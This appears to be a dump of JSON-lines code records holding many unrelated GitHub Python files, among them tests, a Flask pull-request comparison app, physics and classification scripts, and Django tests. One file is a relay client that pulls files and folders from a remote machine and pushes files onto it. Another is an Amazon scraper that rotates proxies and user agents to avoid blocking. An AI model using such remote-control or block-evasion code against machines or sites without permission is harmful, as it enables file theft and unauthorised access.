c:\n c.return_value = 3\n worker = self._Worker()\n handlers = self.psig(cd.install_worker_term_hard_handler, worker)\n try:\n handlers['SIGQUIT']('SIGQUIT', object())\n self.assertTrue(state.should_terminate)\n finally:\n state.should_terminate = False\n\n @disable_stdouts\n def test_worker_term_hard_handler_when_single_threaded(self):\n with patch('celery.apps.worker.active_thread_count') as c:\n c.return_value = 1\n worker = self._Worker()\n handlers = self.psig(cd.install_worker_term_hard_handler, worker)\n with self.assertRaises(SystemTerminate):\n handlers['SIGQUIT']('SIGQUIT', object())\n","repo_name":"jiangningCX/cpython_forum","sub_path":"build/celery/celery/tests/bin/test_celeryd.py","file_name":"test_celeryd.py","file_ext":"py","file_size_in_byte":22999,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"31"} +{"seq_id":"36169885848","text":"from Phidgets.Devices.InterfaceKit import InterfaceKit\nimport time\n\nkit = InterfaceKit()\n\nkit.openPhidget()\n#kit.enableLogging(6,'phid_log.out')\nkit.waitForAttach(2000)\n\ns = dict() \ns['sens'] = np.zeros((1,2))\ns['start_time'] = time.time()\nsec_of_dat = 600\nf_s = 60\nerr_ind = []\nfor i in range(sec_of_dat*f_s):\n s['tic'] = time.time()\n\n sensdat = np.zeros((1,2))\n try:\n sensdat[0,0] = kit.getSensorValue(0)/1000.\n sensdat[0,1] = kit.getSensorValue(1)/1000.\n except:\n print(time.time() - s['start_time'], i)\n print(kit.isAttached())\n err_ind.extend([i])\n\n try:\n print(kit.getSensorRawValue(2), kit.getSensorValue(2))\n except:\n print('novalue')\n\n s['sens'] = np.vstack((s['sens'], sensdat))\n left_over_time = np.max([0, 1000/60. - (time.time() - s['tic'])])\n time.sleep(left_over_time/1000.)\nkit.closePhidget()\nplt.plot(np.array(err_ind)/float(f_s))\n\n\n","repo_name":"carmenalab/brain-python-interface","sub_path":"tests/test_phidgets_joystick_acqu.py","file_name":"test_phidgets_joystick_acqu.py","file_ext":"py","file_size_in_byte":929,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"31"} +{"seq_id":"22685230746","text":"from time import sleep\n\nimport requests\nfrom selectorlib import Extractor\n\nfrom ScrapeAssistance.DataManager import DataManager\nfrom ScrapeAssistance.ProxyGenerator import ProxyGenerator\nfrom ScrapeAssistance.UserAgentGenerator import UserAgentGenerator\nfrom ScrapeAssistance.properties import PATH_YML\n\n\nclass ScrapeGift:\n\n def __init__(self, url: str):\n self.url = url[:url.find('?')]\n\n @staticmethod\n def _get_header():\n return {\n 'authority': 'www.amazon.com',\n 'pragma': 'no-cache',\n 'cache-control': 'no-cache',\n 'dnt': '1',\n 'upgrade-insecure-requests': '1',\n 'user-agent': UserAgentGenerator().user_agent_random_choice(),\n 'referrer': 'https://google.com',\n 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',\n 'Accept-Encoding': 'gzip, deflate, br',\n 'Accept-Language': 'en-US,en;q=0.9',\n 'Pragma': 'no-cache',\n }\n\n @staticmethod\n def _get_proxy():\n return {'https': ProxyGenerator().ip_random_choice()}\n\n def get_parameters(self):\n headers = self._get_header()\n proxy = self._get_proxy()\n selector = Extractor.from_yaml_file(PATH_YML)\n return {\n 'headers': headers,\n 'proxy': proxy,\n 'selector': selector\n }\n\n def scrape_data_json(self, file_name: str):\n while True:\n parameters = self.get_parameters()\n try:\n html = requests.get(\n self.url,\n timeout=7,\n headers=parameters['headers'],\n proxies=parameters['proxy']\n )\n print(html)\n if html.status_code == 200:\n print(\"[INFO] status: 200\")\n data = parameters['selector'].extract(html.text)\n DataManager().download_data_as_json(data, file_name=file_name)\n return data\n print(\"[INFO] Sleeping...\")\n sleep(5)\n except requests.exceptions.Timeout:\n print(\"[INFO] Timeout... Retrying connection\")\n sleep(5)\n continue\n except requests.exceptions.ProxyError:\n print(\"[INFO] Proxy failed... Retrying connection\")\n sleep(5)\n continue\n except requests.exceptions.SSLError:\n print(\"[INFO] SSL verification failed... Retrying connection\")\n sleep(5)\n continue\n except requests.exceptions.HTTPError as error:\n raise SystemExit(error)\n","repo_name":"gerardovitale/gift-scraping","sub_path":"ScrapeGift.py","file_name":"ScrapeGift.py","file_ext":"py","file_size_in_byte":2728,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"43898253154","text":"import re\nfrom flask import Flask, render_template, request, redirect, url_for\nimport pull_request_getter\nimport numpy as np\nfrom tensorflow.keras.models import load_model\nfrom tensorflow.keras.preprocessing import text\nfrom sklearn.metrics.pairwise import cosine_similarity, euclidean_distances\nimport pandas as pd\nfrom sklearn.manifold import TSNE\nimport matplotlib.pyplot as plt\n\nCORPUS_PATH = './skipgram/corpus.txt'\nmodel = load_model('./skipgram/models/skipgram_model.h5')\n\nword_embedding_layer = model.get_layer(index=2)\nword_embedding_weights = word_embedding_layer.get_weights()[0][1:]\n\ndef yield_strings(file_path=CORPUS_PATH):\n with open(file_path, 'r') as f:\n for line in f:\n yield line.strip()\n\ntokenizer = text.Tokenizer()\ntokenizer.fit_on_texts(yield_strings(CORPUS_PATH))\n\nword2idx = tokenizer.word_index\n\nidx2word = {v: k for k, v in word2idx.items()}\nword_ids = [[word2idx[w] for w in text.text_to_word_sequence(s)] for s in yield_strings('skipgram/corpus.txt')]\n\ndef compare_prs(pr_1, pr_2, algorithm):\n pr_1_data = pull_request_getter.get_pull_request(pr_1)\n pr_1_body = parse_body(pr_1_data.body)\n pr_2_data = pull_request_getter.get_pull_request(pr_2)\n pr_2_body = parse_body(pr_2_data.body)\n\n if algorithm == 'average':\n return average_prs(pr_1_body, pr_2_body)\n elif algorithm == 'wordmover':\n return wordmover(pr_1_body, pr_2_body)\n # elif algorithm == 'nn':\n # return nn_algo(pr_1_body, pr_2_body)\n else:\n return 'Invalid algorithm'\n\ndef parse_body(body):\n body = re.sub(r'https?://[^\\s]+', 'LINK', body)\n body = re.sub(r'!\\[.*\\]\\(.*\\)', 'IMAGE', body)\n body = re.sub(r'```.*```', 'CODE', body)\n return body\n\ndef average_prs(pr_1_body, pr_2_body):\n pr_1_tokens = tokenizer.texts_to_sequences([pr_1_body])[0]\n pr_2_tokens = tokenizer.texts_to_sequences([pr_2_body])[0]\n print(pr_1_tokens)\n pr_1_body_embedding = np.mean(word_embedding_weights[pr_1_tokens], axis=0)\n pr_2_body_embedding = np.mean(word_embedding_weights[pr_2_tokens], axis=0)\n print(np.linalg.norm(pr_1_body_embedding - pr_2_body_embedding))\n return np.linalg.norm(pr_1_body_embedding - pr_2_body_embedding)\n\ndef wordmover(pr_1_body, pr_2_body):\n pr_1_body = tokenizer.texts_to_sequences([pr_1_body])[0]\n pr_2_body = tokenizer.texts_to_sequences([pr_2_body])[0]\n smaller_body = pr_1_body if len(pr_1_body) < len(pr_2_body) else pr_2_body\n larger_body = pr_1_body if len(pr_1_body) > len(pr_2_body) else pr_2_body\n move_cost = 0\n for word in smaller_body:\n move_cost += calculate_move_cost(word, larger_body)\n print(move_cost)\n return move_cost\n\n\n\ndef calculate_move_cost(word_1, larger_body):\n word_1_embedding = word_embedding_weights[word_1]\n min_cost = float('inf')\n for word_2 in larger_body:\n word_2_embedding = word_embedding_weights[word_2]\n cost = np.linalg.norm(word_1_embedding - word_2_embedding)\n if cost < min_cost:\n min_cost = cost\n return min_cost\n\ndef create_dataframe(sample_words):\n distance_matrix = euclidean_distances(word_embedding_weights)\n similar_words = {\n search_term: [idx2word[idx] for idx in distance_matrix[word2idx[search_term] - 1].argsort()[1:6] + 1]\n for search_term in sample_words.lower().split()}\n\n words = sum([[k] + v for k, v in similar_words.items()], [])\n words_ids = [word2idx[w] for w in words]\n word_vectors = np.array([word_embedding_weights[idx] for idx in words_ids])\n\n tsne = TSNE(n_components=2, random_state=0, n_iter=10000, perplexity=3)\n np.set_printoptions(suppress=True)\n T = tsne.fit_transform(word_vectors)\n labels = words\n\n plt.figure(figsize=(14, 8))\n plt.scatter(T[:, 0], T[:, 1], c='steelblue', edgecolors='k')\n for label, x, y in zip(labels, T[:, 0], T[:, 1]):\n plt.annotate(label, xy=(x + 1, y + 1), xytext=(0, 0), textcoords='offset points')\n plt.savefig('static/tsne.png')\n\n\napp = Flask(__name__)\n\n@app.route('/')\ndef homepage():\n return render_template('home.html')\n\n@app.route('/', methods=['POST'])\ndef run_algorithm():\n if request.method == 'POST':\n pr_1 = request.form['pr_1']\n pr_2 = request.form['pr_2']\n algorithm = request.form['algorithm']\n result = compare_prs(pr_1, pr_2, algorithm)\n return redirect(url_for('compare_pr_result', result=result))\n\n@app.route('/compare_prs/')\ndef compare_pr_result(result):\n return render_template('compare_prs.html', result=result)\n\n@app.route('/embeddings')\ndef embeddings_page():\n return render_template('embeddings.html')\n\n@app.route('/embeddings', methods=['POST'])\ndef embeddings_post():\n if request.method == 'POST':\n sample_words = request.form['sample_words']\n create_dataframe(sample_words)\n return redirect(url_for('embeddings_result'))\n\n\n@app.route('/embeddings/data')\ndef embeddings_result():\n return render_template('embeddings_result.html')\n\nif __name__ == \"__main__\":\n app.run(debug=True)","repo_name":"ConnBreathnach/GithubProject","sub_path":"src/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":5029,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"71870794007","text":"from message import Message, Header, Command\nfrom client import Client\nfrom time import sleep\nimport threading\n\n_commands = set(item.value for item in Command)\n\n\ndef connection_with_server(_client):\n while True:\n try:\n # Try to send message from queue\n if len(_client.queue_send) > 0:\n _client.log('Sending command to server...')\n msg = _client.queue_send.pop(0)\n _client.send_message(msg)\n\n # Try to process message from queue\n if len(_client.queue_receive) > 0:\n msg = _client.queue_receive.pop(0)\n\n if msg.header == Header.IDLE:\n _client.log('Remote Client not connected!')\n\n if msg.header == Header.RESPONSE:\n _handle_response(msg, _client.log)\n\n if msg.header == Header.AUTO_UPLOAD:\n with open(msg.payload[0], 'wb') as file:\n file.write(msg.payload[1])\n _client.log(f\"File saved as: {msg.payload[0]}\")\n\n except ConnectionError:\n _client.connected_to_server = False\n _client.log('Connection with server failed!')\n\n sleep(0.1)\n\n\ndef _handle_response(msg, log):\n log(f'Response from command: {msg.command.name}')\n\n if isinstance(msg.payload, Exception):\n log('Exception occured!')\n log(msg.payload)\n return\n\n if msg.command in [Command.UPLOAD_FILE, Command.UPLOAD_FOLDER]:\n file_name = msg.payload[0] + ('.zip' if msg.command == Command.UPLOAD_FOLDER else '')\n with open(file_name, 'wb') as file:\n file.write(msg.payload[1])\n log(f\"File saved as: {file_name}\")\n\n else:\n if isinstance(msg.payload, str):\n print(msg.payload)\n\n\ndef command_thread(_client):\n _current_remote_path = ''\n\n while True:\n if not _client.connected_to_server:\n continue\n\n # Get input command from console\n str_input = input(f\"{_current_remote_path}>\")\n args = str_input.split(' ')\n str_command = args.pop(0)\n\n if str_command == 'help':\n print('AVAILABLE COMMANDS:\\n' +\n 'exit\\n' +\n 'cd\\n' +\n 'cd..\\n' +\n 'auto_upload\\n' +\n str(_commands))\n continue\n\n if str_command == 'cd':\n if(len(_current_remote_path)>0):\n _current_remote_path += f'\\\\{args.pop(0)}'\n else:\n _current_remote_path = args.pop(0)\n continue\n\n if str_command == 'cd..':\n while(len(_current_remote_path) > 0 and _current_remote_path[-1] != '\\\\'):\n _current_remote_path = _current_remote_path[:-1]\n _current_remote_path = _current_remote_path[:-1]\n continue\n\n if str_command == 'auto_upload':\n _client.queue_send.append(Message(Header.AUTO_UPLOAD))\n pass\n\n if str_command == 'exit':\n _client.queue_send.append(Message(Header.EXIT))\n continue\n\n if str_command not in _commands:\n if str_command != '':\n _client.log(f'Command \"{str_command}\" not found.')\n continue\n\n command = Command(str_command)\n if(len(_current_remote_path) > 0):\n _remote_path = _current_remote_path + '\\\\' + ' '.join(args)\n else:\n _remote_path = ' '.join(args)\n\n msg = Message(Header.COMMAND, command)\n\n if command == Command.DOWNLOAD_FILE:\n file_path = input(\"Enter file path: \")\n try:\n with open(file_path, 'rb') as file:\n data = file.read()\n msg.payload = (_remote_path, data)\n except Exception as e:\n print(e)\n else:\n msg.payload = _remote_path\n\n _client.queue_send.append(msg)\n\n\nif __name__ == \"__main__\":\n # _client = Client('Local Client', '127.0.0.1', 55554)\n _client = Client('Local Client', 'server_ip', 55554)\n\n _command_thread = threading.Thread(target=command_thread, args=[_client])\n _command_thread.start()\n\n connection_with_server(_client)\n","repo_name":"adrian-slimak/simple-client-server-client","sub_path":"source/local_client.py","file_name":"local_client.py","file_ext":"py","file_size_in_byte":4229,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"6244491348","text":"\n'''\nAmplitude measured when driving force less than natty frequency\n\nlike it does not work cuz the data is fucked\n\n'''\nimport wave\nfrom scipy.optimize import curve_fit\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport math\n\n\ndef expo(x, a): #x is k\n # y=y0*a(e^(kx))\n return a*(np.e**(x))\n # return a*x\n # return ((a*np.exp(2))+(x*np.exp(2))*(b*np.exp(2)))*np.exp(1/2)\ndef twoExpo(x,a):\n return a*(np.e**x-np.e**(-1*x))\n\namp = np.array([0.052,0.034,0.02,0.009,0.005,0.002,0.002,0.001,0])*100\ndistance = np.arange(160,-20,-20) #0-180 with steps of 20\namp = np.array([2*np.e**0,2*np.e**1,2*np.e**2])\ndistance = np.array([0,1,2])\ny0 = 0.052 #this is the driving amplitude\n\nprint(expo(2,1))\n# popt, pcov = curve_fit(expo, distance, amp);\n# plt.plot(distance, expo(distance, *popt), label='fit: a=%5.10f' %tuple(popt))\npopt, pcov = curve_fit(expo, distance, amp);\nplt.plot(distance, expo(distance, *popt), label='fit: a=%5.10f' %tuple(popt))\nplt.plot(distance,amp)\n# plt.gca().invert_xaxis()\nplt.legend()\nplt.show()\n\n# #k = 2pi/lambda\n# omega_sqare = np.power(omega,2)\n# waveLength = np.array([1.1, 0.725,0.635,0.513])\n# k = (2*np.pi)/waveLength\n# k_unc = np.array([0.003, 0.006,0.008,0.01])*np.exp(2) #for erorr on square graph do u square uncertainity too\n# omega_unc = np.array([0.6,0.7,0.9,1]) *np.exp(2)\n\n# k_square = np.power(k,2)\n# popt, pcov = curve_fit(func1, omega_sqare, k_square)\n\n# print(func1(1,1,1))\n# # plt.plot(k_square, omega_sqare)\n# # plt.plot(k_square,omega_sqare, label ='measured')\n# plt.errorbar(k_square,omega_sqare, xerr=k_unc,yerr=omega_unc, label='measured')\n# plt.plot(k_square, func1(k_square, *popt), 'r-', label='fit: \\u03C90=%5.3f, c=%5.3f' % tuple(popt))\n# # plt.errorbar(k_square, func1(k_square, *popt), yerr=10)\n# # # curve = func1(k,pcov[0,0]**(0.5),pcov[1,1]**(0.5))\n# # plt.plot(k,func1(k, *popt))\n# plt.legend()\n# plt.show()\n\n\n","repo_name":"trossossp3/PHY293","sub_path":"slinky/part5.py","file_name":"part5.py","file_ext":"py","file_size_in_byte":1887,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"12790969501","text":"#\n# THIS FILE IS PART OF THE MUMBLES PROJECT AND IS LICENSED UNDER THE GPL.\n# SEE THE 'COPYING' FILE FOR DETAILS\n#\n# Generic Mumbles Plugin\n#\n#------------------------------------------------------------------------\n\nfrom setuptools import setup\nimport sys, os\nfrom shutil import copy\n\n__author__ = 'aegis '\n__doc__ = 'A core function plugin for mumbles'\n__version__ = '0.1'\n\nsetup(\n\tname='CoreFuncMumbles',\n\tversion=__version__,\n\tdescription=__doc__,\n\tauthor=__author__,\n\tpackages=['corefuncmumbles'],\n\tpackage_dir={'corefuncmumbles':'src'},\n\tentry_points='''\n\t[mumbles.plugins]\n\tCoreFuncMumbles = corefuncmumbles:CoreFuncMumbles\n\t'''\n)\n\n# copy egg file to plugin directory\ncopy(\"dist/CoreFuncMumbles-%s-py%d.%d.egg\" %(__version__,sys.version_info[0],sys.version_info[1]), \"../../\")\n\n\n","repo_name":"xiongchiamiov/mumbles","sub_path":"src/plugins/eggs/corefunc/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":808,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"31"} +{"seq_id":"7095136516","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"NOME\"\"\"\n\n__version__ = '1.0'\n__author__ = 'Victor Augusto'\n__copyright__ = \"Copyright (c) 2018 - Victor Augusto\"\n\nimport collections\nimport operator\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport networkx as nx\nfrom scipy.stats import entropy\nfrom sklearn.metrics.pairwise import cosine_similarity\nfrom sklearn import svm\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.naive_bayes import GaussianNB\n\nclass Classification(object):\n\t\"\"\"First line of a docstring is short and next to the quotes.\n\n\tClass and exception names are CapWords.\n\n\tClosing quotes are on their own line\n\t\"\"\"\n\n\tdef __init__(self, truth):\n\t\t\"\"\"Constructor.\"\"\"\n\t\tself.truth = truth\n\t\tself.X = [truth[0][0].tolist(), truth[1][0].tolist(), truth[2][0].tolist()]\n\t\tself.y = ['random', 'small-world', 'scale-free']\n\n\tdef __del__(self):\n\t\t\"\"\"Destructor.\"\"\"\n\t\tdel self\n\n\tdef cosine_similarity_classification(self, fv):\n\t\tprint('=============== Cosine Similarity Comparison\\n')\n\t\ter_fv, ws_fv, ba_fv = self.truth\n\n\t\tsim_er = cosine_similarity(er_fv, fv)[0][0]\n\t\tsim_ws = cosine_similarity(ws_fv, fv)[0][0]\n\t\tsim_ba = cosine_similarity(ba_fv, fv)[0][0]\n\n\t\tprint('Cosine similarity with Erdos-Renyi (Random): \\t' + str(sim_er))\n\t\tprint('Cosine similarity with Watts-Strogatz (Small-World): \\t' + str(sim_ws))\n\t\tprint('Cosine similarity with Barabasi-Albert (Scale-Free): \\t' + str(sim_ba))\n\t\tprint('\\n')\n\n\tdef classify(self, classifier, fv):\n\t\tclf = None\n\t\tif classifier == 'svm':\n\t\t\tclf = svm.SVC(gamma='scale', probability=True)\n\t\t\tprint(\"=============== SVM Classifier\\n\")\n\t\t\tprint(clf)\n\t\t\tprint('\\n')\n\t\t\tclf.fit(self.X, self.y)\n\n\t\tif classifier == 'random_forest':\n\t\t\tclf = RandomForestClassifier()\n\t\t\tprint(\"=============== Random Forest Classifier\\n\")\n\t\t\tprint(clf)\n\t\t\tprint('\\n')\n\t\t\tclf.fit(self.X, self.y)\n\n\t\tif classifier == 'gaussianNB':\n\t\t\tclf = GaussianNB()\n\t\t\tprint(\"=============== Gaussian Naive Bayes Classifier\\n\")\n\t\t\tprint(clf)\n\t\t\tprint('\\n')\n\t\t\tclf.fit(self.X, self.y)\n\n\t\tproba = clf.predict_proba(fv)[0]\n\t\tprediction = clf.predict(fv)[0]\n\n\t\tprint('Probability of Random Network: ' + str(proba[0]))\n\t\tprint('Probability of Small-World Network: ' + str(proba[1]))\n\t\tprint('Probability of Scale-Free Network: ' + str(proba[2]))\n\t\tprint('Predicted: ' + prediction)\n\t\tprint('\\n')","repo_name":"vaugus/stomata-complex-network-analysis","sub_path":"classification.py","file_name":"classification.py","file_ext":"py","file_size_in_byte":2340,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"33532338246","text":"from vector.vec import Vec\nfrom matrix.mat import Mat\nfrom matrix import matutil, solver\n\n# def zero_matrix(i, j):\n# return [[0 for a in range(i)] for b in range(j)]\n\n# def zero_column_matrix(i, j):\n# return [[(a - b) for a in range(j)] for b in range(i)]\n\n# M = Mat(\n# ({'a', 'b'}, {'@', '#', '?'}),\n# {\n# ('a', '@'): 1,\n# ('a', '#'): 2,\n# ('a', '?'): 3,\n\n# ('b', '@'): 10,\n# ('b', '#'): 20,\n# ('b', '?'): 30,\n# })\n# class Mat:\n# def __init__(self, labels, function):\n# self.D = labels\n# self.f = function\n\n# def identity(D): return Mat(D, {(d, d): 1 for d in D})\n\n# def mat2rowdict(M):\n# return {r: Vec(M.D[1], {c: M[r, c] for c in M.D[1]}) for r in M.D[0]}\n\n# def mat2codict(M):\n# return {c: Vec(M.D[0], {r: M[r, c] for r in M.D[0]}) for c in M.D[1]}\n\n# 4.6.3\ndef determine_consumption():\n D = {'radio', 'sensor', 'memory', 'CPU'}\n v0 = Vec(D, {'radio': .1, 'CPU':.3})\n v1 = Vec(D, {'sensor': .2, 'CPU':.4})\n v2 = Vec(D, {'memory': .3, 'CPU':.1})\n v3 = Vec(D, {'memory': .5, 'CPU':.4})\n v4 = Vec(D, {'radio': .2, 'CPU':.5})\n\n b = Vec({0, 1, 2, 3, 4}, {0: 140.0, 1: 170.0, 2: 60.0, 3: 170.0, 4:250.0})\n A = matutil.rowdict2mat([v0, v1, v2, v3, v4])\n rate = solver.solve(A, b)","repo_name":"ftripier/Coding-The-Matrix","sub_path":"matrix/scratch.py","file_name":"scratch.py","file_ext":"py","file_size_in_byte":1222,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"70150654170","text":"class Solution:\n def maxiumSumIncresingSubSequenceTabulation(self,arr):\n dp=[0]*(len(arr))\n dp[0]=arr[0]\n for i in range(1,len(arr)):\n max_=0\n for j in range(i,-1,-1):\n if arr[i]>arr[j]:\n max_=max(max_,dp[j])\n dp[i]=max_+arr[i]\n return dp\n \n \n \nsol=Solution()\narr=[10,22,9,33,21,50,41,60,80,3]\nprint(sol.maxiumSumIncresingSubSequenceTabulation(arr))\n \n \n ","repo_name":"samirpatil2000/Programs101","sub_path":"Syllabus/DynamicProgramming/AdvancedDP/2__MaxiumSumIncreasingSubsq_.py","file_name":"2__MaxiumSumIncreasingSubsq_.py","file_ext":"py","file_size_in_byte":503,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"28106099836","text":"from marshmallow_jsonschema.base import JSONSchema\n\n\nclass ReactJsonSchemaFormJSONSchema(JSONSchema):\n \"\"\"\n Usage (assuming marshmallow v3):\n\n class MySchema(Schema):\n first_name = fields.String(\n metadata={\n 'ui:autofocus': True,\n }\n )\n last_name = fields.String()\n\n class Meta:\n react_uischema_extra = {\n 'ui:order': [\n 'first_name',\n 'last_name',\n ]\n }\n\n\n json_schema_obj = ReactJsonSchemaFormJSONSchema()\n json_schema, uischema = json_schema_obj.dump_with_uischema(MySchema())\n \"\"\"\n\n def dump_with_uischema(self, obj, many=None, *args):\n \"\"\"Runs both dump and dump_uischema\"\"\"\n dump = self.dump(obj, *args, many=many)\n uischema = self.dump_uischema(obj, *args, many=many)\n return dump, uischema\n\n def dump_uischema(self, obj, many=None, *args):\n \"\"\"\n Attempt to return something resembling a uiSchema compliant with\n react-jsonschema-form\n\n See: https://react-jsonschema-form.readthedocs.io/en/latest/form-customization/#the-uischema-object\n \"\"\"\n return dict(self._dump_uischema_iter(obj, *args, many=many))\n\n def _dump_uischema_iter(self, obj, many=None, *args):\n \"\"\"\n This is simply implementing a Dictionary Iterator for\n ReactJsonSchemaFormJSONSchema.dump_uischema\n \"\"\"\n\n for k, v in getattr(obj.Meta, \"react_uischema_extra\", {}).items():\n yield k, v\n\n for field_name, field in obj.fields.items():\n # NOTE: doubled up to maintain backwards compatibility\n metadata = field.metadata.get(\"metadata\", {})\n metadata.update(field.metadata)\n yield field_name, {k: v for k, v in metadata.items() if k.startswith(\"ui:\")}\n","repo_name":"fuhrysteve/marshmallow-jsonschema","sub_path":"marshmallow_jsonschema/extensions/react_jsonschema_form.py","file_name":"react_jsonschema_form.py","file_ext":"py","file_size_in_byte":1869,"program_lang":"python","lang":"en","doc_type":"code","stars":203,"dataset":"github-code","pt":"31"} +{"seq_id":"18465637482","text":"import datetime\nfrom django.core import mail\nfrom django.test import TestCase, override_settings\nfrom django.urls import reverse\nfrom reversion.models import Version\n\nfrom . import models\nfrom .factories import *\nfrom home import scenarios\nfrom home.email import organizers\n\n# don't try to use the static files manifest during tests\n@override_settings(STATICFILES_STORAGE='django.contrib.staticfiles.storage.StaticFilesStorage')\nclass InternSelectionTestCase(TestCase):\n def test_intern_selection_process(self):\n for phase in ('contributions_open', 'contributions_close'):\n with self.subTest(phase=phase):\n current_round = RoundPageFactory(start_from=phase)\n applicantapproval = ApplicantApprovalFactory(\n application_round=current_round,\n approval_status=models.ApprovalStatus.APPROVED,\n )\n\n project = ProjectFactory(\n project_round__participating_round=current_round,\n approval_status=models.ApprovalStatus.APPROVED,\n project_round__approval_status=models.ApprovalStatus.APPROVED,\n )\n\n finalapplication = FinalApplicationFactory(\n round=current_round, project=project, applicant=applicantapproval\n )\n\n mentorapproval = MentorApprovalFactory(\n project=project, approval_status=models.ApprovalStatus.APPROVED\n )\n\n coordinatorapproval = CoordinatorApprovalFactory(\n community=project.project_round.community,\n approval_status=models.ApprovalStatus.APPROVED,\n )\n\n organizer = ComradeFactory(account__is_staff=True).account\n\n post_params = {\n \"round_slug\": current_round.slug,\n \"community_slug\": project.project_round.community.slug,\n \"project_slug\": project.slug,\n \"applicant_username\": applicantapproval.applicant.account.username,\n }\n\n # mentor selects the intern..\n self.client.force_login(mentorapproval.mentor.account)\n path = reverse(\"select-intern\", kwargs={**post_params})\n\n legal_name = mentorapproval.mentor.public_name\n response = self.client.post(path, {\n \"rating-rating\": models.FinalApplication.AMAZING,\n \"contract-legal_name\": legal_name,\n })\n self.assertEqual(response.status_code, 302)\n\n new_relationship = models.MentorRelationship.objects.get(mentor=mentorapproval)\n intern_selection = new_relationship.intern_selection\n self.assertEqual(new_relationship.contract.legal_name, legal_name)\n self.assertEqual(intern_selection.applicant, applicantapproval)\n self.assertEqual(intern_selection.project, project)\n\n # organizer approves too early, rejected..\n self.client.force_login(organizer)\n path = reverse(\"intern-approval\", kwargs={\n **post_params,\n \"approval\": \"Approved\",\n })\n response = self.client.post(path)\n self.assertEqual(response.status_code, 403)\n intern_selection = models.InternSelection.objects.get(project=project)\n self.assertEqual(intern_selection.organizer_approved, None)\n\n # coordinator adds funding..\n self.client.force_login(coordinatorapproval.coordinator.account)\n path = reverse(\"intern-fund\", kwargs={\n **post_params,\n \"funding\": models.InternSelection.GENERAL_FUNDED,\n })\n response = self.client.post(path)\n self.assertEqual(response.status_code, 302)\n\n intern_selection = models.InternSelection.objects.get(project=project)\n self.assertEqual(intern_selection.funding_source, models.InternSelection.GENERAL_FUNDED)\n\n # organizer approves..\n self.client.force_login(organizer)\n path = reverse(\"intern-approval\", kwargs={\n **post_params,\n \"approval\": \"Approved\",\n })\n response = self.client.post(path)\n self.assertEqual(response.status_code, 302)\n\n intern_selection = models.InternSelection.objects.get(project=project)\n self.assertEqual(intern_selection.organizer_approved, True)\n\n def test_intern_selection_emails(self):\n scenario = scenarios.ContributionsClosedScenario()\n\n rejected_mentor = MentorApprovalFactory(\n project=scenario.project, approval_status=models.ApprovalStatus.REJECTED\n )\n withdrawn_mentor = MentorApprovalFactory(\n project=scenario.project, approval_status=models.ApprovalStatus.WITHDRAWN\n )\n approved_comentor = MentorApprovalFactory(\n project=scenario.project, approval_status=models.ApprovalStatus.APPROVED\n )\n\n post_params = {\n \"round_slug\": scenario.round.slug,\n \"community_slug\": scenario.project.project_round.community.slug,\n \"project_slug\": scenario.project.slug,\n \"applicant_username\": scenario.applicant1.applicant.account.username,\n }\n legal_name = scenario.mentor.public_name\n\n # mentor selects the intern.\n self.client.force_login(scenario.mentor.account)\n path = reverse(\"select-intern\", kwargs={**post_params})\n response = self.client.post(path, {\n \"rating-rating\": models.FinalApplication.AMAZING,\n \"contract-legal_name\": legal_name,\n })\n\n self.assertEqual(len(mail.outbox), 1)\n self.assertEqual(mail.outbox[0].subject, 'Outreachy intern selected - please sign mentoring agreement')\n self.assertEqual(mail.outbox[0].from_email, organizers)\n\n # Check important links are in the email body\n comentor_sign_up_link = reverse('select-intern', kwargs={\n 'round_slug': scenario.round.slug,\n 'community_slug': scenario.community.slug,\n 'project_slug' : scenario.project.slug,\n 'applicant_username': scenario.applicant1.applicant.account.username,\n })\n project_applicants_link = reverse('project-applicants', kwargs={\n 'round_slug': scenario.round.slug,\n 'community_slug': scenario.community.slug,\n 'project_slug' : scenario.project.slug,\n })\n self.assertIn(comentor_sign_up_link, mail.outbox[0].body)\n self.assertIn(project_applicants_link, mail.outbox[0].body)\n self.assertIn(reverse('alums'), mail.outbox[0].body)\n\n # The rejected and withdrawn mentors\n # should not get an email about the intern selection,\n # but the approved co-mentor should get an email.\n self.assertEqual(mail.outbox[0].to, [approved_comentor.mentor.email_address()])\n\n def test_mentor_can_resign(self):\n current_round = RoundPageFactory(start_from='midfeedback')\n for mentors_count in (1, 2):\n with self.subTest(mentors_count=mentors_count):\n internselection = InternSelectionFactory(\n active=True,\n mentors=mentors_count,\n round=current_round,\n )\n mentors = list(internselection.mentors.all())\n mentor = mentors.pop()\n\n path = reverse('resign-as-mentor', kwargs={\n 'round_slug': internselection.round().slug,\n 'community_slug': internselection.project.project_round.community.slug,\n 'project_slug': internselection.project.slug,\n 'applicant_username': internselection.applicant.applicant.account.username,\n })\n\n self.client.force_login(mentor.mentor.account)\n response = self.client.post(path)\n self.assertEqual(response.status_code, 302)\n\n self.assertQuerysetEqual(internselection.mentors.all(), mentors, transform=lambda x: x)\n\n @staticmethod\n def _mentor_feedback_form(internselection, **kwargs):\n defaults = {\n 'in_contact': True,\n 'asking_questions': True,\n 'active_in_public': True,\n 'provided_onboarding': True,\n 'checkin_frequency': models.InitialMentorFeedback.ONCE_WEEKLY,\n 'last_contact': internselection.initial_feedback_opens,\n 'intern_response_time': models.InitialMentorFeedback.HOURS_12,\n 